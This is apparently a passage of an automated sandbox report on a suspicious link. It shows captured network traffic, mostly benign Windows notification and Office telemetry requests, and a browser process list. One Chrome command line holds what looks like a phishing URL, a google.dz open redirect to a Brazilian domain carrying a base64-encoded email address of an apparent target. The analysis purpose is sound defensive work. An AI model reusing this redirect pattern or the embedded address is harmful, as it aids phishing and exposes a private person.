                      2024-12-03 16:52:29 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                      Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                      2024-12-03 16:52:29 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 77 35 73 2b 33 39 54 39 58 55 61 4f 36 51 30 43 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 36 38 66 66 39 32 66 39 66 36 39 63 64 37 61 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 52 42 33 33 77 58 39 56 4c 44 37 43 76 62 50 53 6d 79 55 30 61 6f 64 4e 4e 46 38 4f 56 49 48 66 2f 43 6c 36 5a 43 41 71 66 65 4c 32 58 35 33 68 63 64 44 62 4e 6c 69 48 64 65 59 45 64 33 64 4e 58 69 79 43 44 77 4b 39 39 35 47 6a 52 55 57 4f 53 74 30 75 6e 6d 51 33 72 50 43 72 44 55 58 6a 4c 4a 56 56 50 56 32 48 70 42 56 63 32
                      Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: w5s+39T9XUaO6Q0C.2Context: 168ff92f9f69cd7a<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAARB33wX9VLD7CvbPSmyU0aodNNF8OVIHf/Cl6ZCAqfeL2X53hcdDbNliHdeYEd3dNXiyCDwK995GjRUWOSt0unmQ3rPCrDUXjLJVVPV2HpBVc2
                      2024-12-03 16:52:29 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 77 35 73 2b 33 39 54 39 58 55 61 4f 36 51 30 43 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 36 38 66 66 39 32 66 39 66 36 39 63 64 37 61 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                      Data Ascii: BND 3 CON\WNS 0 197MS-CV: w5s+39T9XUaO6Q0C.3Context: 168ff92f9f69cd7a<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                      2024-12-03 16:52:29 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                      Data Ascii: 202 1 CON 58
                      2024-12-03 16:52:29 UTC58INData Raw: 4d 53 2d 43 56 3a 20 55 63 43 4e 44 31 47 55 57 6b 71 47 76 4c 53 56 70 6c 72 6c 68 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                      Data Ascii: MS-CV: UcCND1GUWkqGvLSVplrlhQ.0Payload parsing failed.


                      Session IDSource IPSource PortDestination IPDestination Port
                      143192.168.2.64986313.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:52:29 UTC192OUTGET /rules/rule702500v1s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:52:29 UTC494INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:52:29 GMT
                      Content-Type: text/xml
                      Content-Length: 1378
                      Connection: close
                      Vary: Accept-Encoding
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                      ETag: "0x8DC582BDB813B3F"
                      x-ms-request-id: 23b2b3fe-701e-0021-35e8-443d45000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165229Z-174f7845968frfdmhC1EWRxxbw000000169000000000a60z
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:52:29 UTC1378INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammability" S="Medium" />


                      Session IDSource IPSource PortDestination IPDestination Port
                      144192.168.2.64986413.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:52:29 UTC192OUTGET /rules/rule700501v1s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:52:29 UTC494INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:52:29 GMT
                      Content-Type: text/xml
                      Content-Length: 1405
                      Connection: close
                      Vary: Accept-Encoding
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:27:58 GMT
                      ETag: "0x8DC582BE89A8F82"
                      x-ms-request-id: de3e9c2e-601e-0084-79fe-446b3f000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165229Z-174f7845968frfdmhC1EWRxxbw000000164g00000000thkk
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:52:29 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                      Session IDSource IPSource PortDestination IPDestination Port
                      145192.168.2.64986513.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:52:29 UTC192OUTGET /rules/rule700500v1s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:52:30 UTC494INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:52:29 GMT
                      Content-Type: text/xml
                      Content-Length: 1368
                      Connection: close
                      Vary: Accept-Encoding
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                      ETag: "0x8DC582BE51CE7B3"
                      x-ms-request-id: 21a32f9a-a01e-003d-21b4-4298d7000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165229Z-174f7845968swgbqhC1EWRmnb4000000169000000000r99q
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:52:30 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 6f 77 65 72 50 6f 69 6e 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPowerPoint" S="Medium" /> <F T=


                      Session IDSource IPSource PortDestination IPDestination Port
                      146192.168.2.64986613.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:52:30 UTC192OUTGET /rules/rule702551v1s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:52:30 UTC494INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:52:30 GMT
                      Content-Type: text/xml
                      Content-Length: 1415
                      Connection: close
                      Vary: Accept-Encoding
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                      ETag: "0x8DC582BDCE9703A"
                      x-ms-request-id: 5e2e43e0-a01e-0002-3ba3-435074000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165230Z-174f7845968swgbqhC1EWRmnb400000016c000000000bs7v
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:52:30 UTC1415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702551" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                      Session IDSource IPSource PortDestination IPDestination Port
                      147192.168.2.64986713.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:52:31 UTC192OUTGET /rules/rule702550v1s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:52:31 UTC494INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:52:31 GMT
                      Content-Type: text/xml
                      Content-Length: 1378
                      Connection: close
                      Vary: Accept-Encoding
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                      ETag: "0x8DC582BE584C214"
                      x-ms-request-id: dbe9ef63-901e-005b-3a83-3f2005000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165231Z-174f7845968kvnqxhC1EWRmf3g0000000t30000000003cwu
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:52:31 UTC1378INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702550" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPersonalization" S="Medium" />


                      Session IDSource IPSource PortDestination IPDestination Port
                      148192.168.2.64986813.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:52:31 UTC192OUTGET /rules/rule701351v1s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:52:32 UTC494INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:52:31 GMT
                      Content-Type: text/xml
                      Content-Length: 1407
                      Connection: close
                      Vary: Accept-Encoding
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                      ETag: "0x8DC582BE687B46A"
                      x-ms-request-id: 56289a14-001e-0028-02a9-42c49f000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165231Z-174f78459685726chC1EWRsnbg000000168g00000000dp03
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:52:32 UTC1407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok


                      Session IDSource IPSource PortDestination IPDestination Port
                      149192.168.2.64986913.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:52:31 UTC192OUTGET /rules/rule701350v1s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:52:32 UTC494INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:52:32 GMT
                      Content-Type: text/xml
                      Content-Length: 1370
                      Connection: close
                      Vary: Accept-Encoding
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                      ETag: "0x8DC582BDE62E0AB"
                      x-ms-request-id: 81949a54-c01e-00a2-6633-402327000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165232Z-174f7845968px8v7hC1EWR08ng00000016hg000000003as0
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:52:32 UTC1370INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPerformance" S="Medium" /> <F


                      020406080s020406080100

                      Click to jump to process

                      020406080s0.0020406080100MB

                      Click to jump to process

                      Target ID:1
                      Start time:11:51:15
                      Start date:03/12/2024
                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                      Imagebase:0x7ff684c40000
                      File size:3'242'272 bytes
                      MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:false

                      Target ID:2
                      Start time:11:51:19
                      Start date:03/12/2024
                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2288 --field-trial-handle=2256,i,11265624852197231515,14874182211913071364,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                      Imagebase:0x7ff684c40000
                      File size:3'242'272 bytes
                      MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:false

                      Target ID:4
                      Start time:11:51:26
                      Start date:03/12/2024
                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://google.dz/url?q=lbjaqJLi6z3yh&rct=tTPvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/s%2fhandlingservice.com.br%2fyoya/sitg/YW15LmdpbHBpbkBjaGVyb2tlZWJyaWNrLmNvbQ==%E3%80%82$$$%E3%80%82"
                      Imagebase:0x7ff684c40000
                      File size:3'242'272 bytes
                      MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:true
                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                      No disassembly